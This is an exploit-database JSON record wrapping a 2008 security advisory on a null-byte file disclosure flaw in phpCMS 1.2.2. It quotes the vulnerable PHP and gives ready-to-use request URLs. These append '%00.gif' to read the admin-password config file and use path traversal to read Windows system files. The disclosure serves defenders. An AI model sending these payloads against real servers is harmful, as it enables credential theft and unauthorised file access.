Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-2561", "type": "zdt", "bulletinFamily": "exploit", "title": "phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-01-29T00:00:00", "modified": "2008-01-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/2561", "reporter": "DSecRG", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-26T23:16:46", "viewCount": 7, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://0day.today/exploit/2561", "sourceData": "===================================================================\r\nphpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-08-005\r\n\r\n\r\nApplication: phpCMS\r\nVersions Affected: 1.2.2\r\nVendor URL: http://www.phpcms.de\r\nBug: Remote File Disclosure, Get admin password\r\nExploits: YES\r\nReported: 10.01.2008\r\nVendor response: 12.01.2008\r\nDate of Public Advisory: 29.01.2008\r\nAuthors: Alexandr Polyakov, Stas Svistunovich\r\n Digital Security Research Group [DSecRG] \r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nThe phpCMS system has a remote file disclosure vulnerability in page /parser/include/class.cache_phpcms.php\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAn attacker can read any file in the web directory.\r\n\r\nFile parser/parser.php includes class.cache_phpcms.php:\r\n\r\n---------------------------------------\r\n\r\n // Load the i18n Handler\r\n if (isset ($_GET ['file']) && isset($DEFAULTS->I18N) && 'on' == $DEFAULTS->I18N) {\r\n include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');\r\n $I18N = &new i18n;\r\n }\r\n $PHPCMS->check_secure_stealth();\r\n include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');\r\n exit;\r\n\r\n---------------------------------------\r\n\r\n\r\nIn file class.cache_phpcms.php, function GetFile() parses the URL and returns the full file name or a default value.\r\nThe function checks the file extension but doesn't check for null byte injection.\r\n\r\nTo read a file, an attacker appends a null byte followed by a valid extension to the file name, such as \"%00.gif\".\r\n\r\n---------------------------------------\r\n\r\n// filequery exists, but filename is empty? -> set the defaultvalue for filename\r\nif(!stristr($temp, $DEFAULTS->PAGE_EXTENSION) AND\r\n !stristr($temp, '.gif') AND\r\n !stristr($temp, '.png') AND\r\n !stristr($temp, '.jpg') AND\r\n !stristr($temp, '.js') AND\r\n !stristr($temp, '.css') AND\r\n !stristr($temp, '.htm') AND\r\n !stristr($temp, '.html'))\r\n\r\n{ if(substr($temp, -1) != '/') {\r\n $temp = trim($temp).'/'.$DEFAULTS->PAGE_DEFAULTNAME;\r\n $temp.= $DEFAULTS->PAGE_EXTENSION;\r\n } else {\r\n $temp = trim($temp).$DEFAULTS->PAGE_DEFAULTNAME;\r\n $temp.= $DEFAULTS->PAGE_EXTENSION;\r\n }\r\n}\r\n\r\n---------------------------------------\r\n\r\n\r\nIn file class.cache_phpcms.php, function CheckFile() takes the file name and, if the file exists, reads it and prints its contents.\r\n\r\n---------------------------------------\r\n$PfadUndDatei = $this->GetFile();\r\n\r\n$this->name = basename($PfadUndDatei);\r\n$this->path = dirname($PfadUndDatei);\r\n...\r\n\r\n// there's no contentfile with this name -> errorpage or errormessage\r\nif(!file_exists($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name)) {\r\n $errorname = basename($DEFAULTS->ERROR_PAGE_404);\r\n $errorpath = dirname($DEFAULTS->ERROR_PAGE_404);\r\n ...\r\n...\r\n\r\n$fsize = filesize($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name);\r\n$fd = fopen($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name, \"rb\");\r\n$contents = fread($fd, $fsize);\r\n$contents = trim($contents);\r\n$fsize = strlen($contents);\r\nfclose($fd);\r\n...\r\n\r\necho $contents;\r\n\r\n---------------------------------------\r\n\r\n\r\nExample:\r\n\r\n\r\n\r\nhttp://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif\r\n\r\ndefault.php contains the admin password and other defaults:\r\n\r\n---------------------------------------\r\n\r\nclass defaults {\r\n function defaults() {\r\n global $PHP, $PHPCMS;\r\n if(!defined(\"_DEFAULTS_\")) {\r\n define(\"_DEFAULTS_\", TRUE);\r\n }\r\n\r\n $this->PASS = 'YourPasswordHere';\r\n...\r\n\r\n---------------------------------------\r\n\r\n\r\nOn Windows, any local file can be read:\r\n\r\nhttp://[server]/[installdir]/parser/parser.php?file=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00.gif\r\n\r\n\r\n\r\n\r\nhttp://www.phpcms.de/download/index.en.html\r\n\r\n\r\n\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\n\r\n\r\n\r\nDigital Security is a leading IT security company in Russia, providing information security consulting, audit \r\nand penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 \r\nand PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with \r\nvulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "_state": {"dependencies": 1645262992}}